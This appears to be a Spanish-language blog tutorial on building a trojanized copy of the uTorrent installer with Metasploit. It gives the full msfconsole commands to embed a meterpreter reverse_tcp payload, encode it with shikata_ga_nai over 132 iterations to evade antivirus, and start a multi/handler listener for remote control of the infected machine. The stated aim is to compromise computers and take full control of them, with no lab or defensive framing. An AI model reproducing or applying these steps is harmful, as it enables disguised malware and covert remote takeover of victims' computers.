Al utilizar metasploit es posible fusionar una sesión de meterpreter a un exe sin ser detectado por los antivirus, ademas esto permite vulnerar equipos y obtener una sesion remota de meterpreter con la cual se puede obtener el completo control de la maquina vulnerada.
1.- Primero vamos a iniciar el servicio de metasploit (si no lo tienes iniciado) para ello vamos a: Aplicaciones -> Kali Linux -> System Services -> Metasploit -> community / pro start.
2.- Iniciado el servicio y usando la misma terminal, tecleamos el siguiente comando: msfconsole. El cual nos dara la siguiente terminal.
3.- Ahora seleccionamos el exe que usaremos como plantilla, en mi caso usare Utorrent para windows.
4. Ahora asignaremos el payload a usar y los parametros quedando algo asi:
use payload/windows/meterpreter/reverse_tcp -> payload a usar
set LHOST 192.168.15.118 ->aqui tu ip
set LPORT 4445 ->aqui el puerto que prefieras
5.- Ahora con el comando generate iniciaremos con la fusion de nuestro meterpreter.
generate -e x86/shikata_ga_nai -i 132 -x /root/Burlar/uTorrent.exe -k -t exe -f /root/Burlar/uTorrent1.exe
Quedando todo como en la imagen (no olvides reemplazar la direccion del exe por la que uses):
6.- Ahora toca levantar el handler para que este quede a la espera de la coneccion de nuestro archivo infectado.
use multi/handler
set payload windows/meterpreter/reverse_tcp ->payload utilizado
set lhost 192.168.15.118 -> nuestra ip
set lport 4445 ->puerto que elejimos
exploit ->iniciar el handler
Quedando como en la siguiente imagen:
7.- Ahora revisaremos que tan efectivo fue nuestro trabajo
8.- Ahora para probar que si funciona nuestro archivo infectado dejo un video haciendo la prueba de su uso.
link:
Pues como puedes ver es muy facil asi que si te gusto no olvides darme like seguirme o un +1.
Saludos y que tengas un buen dia
g1iore3y87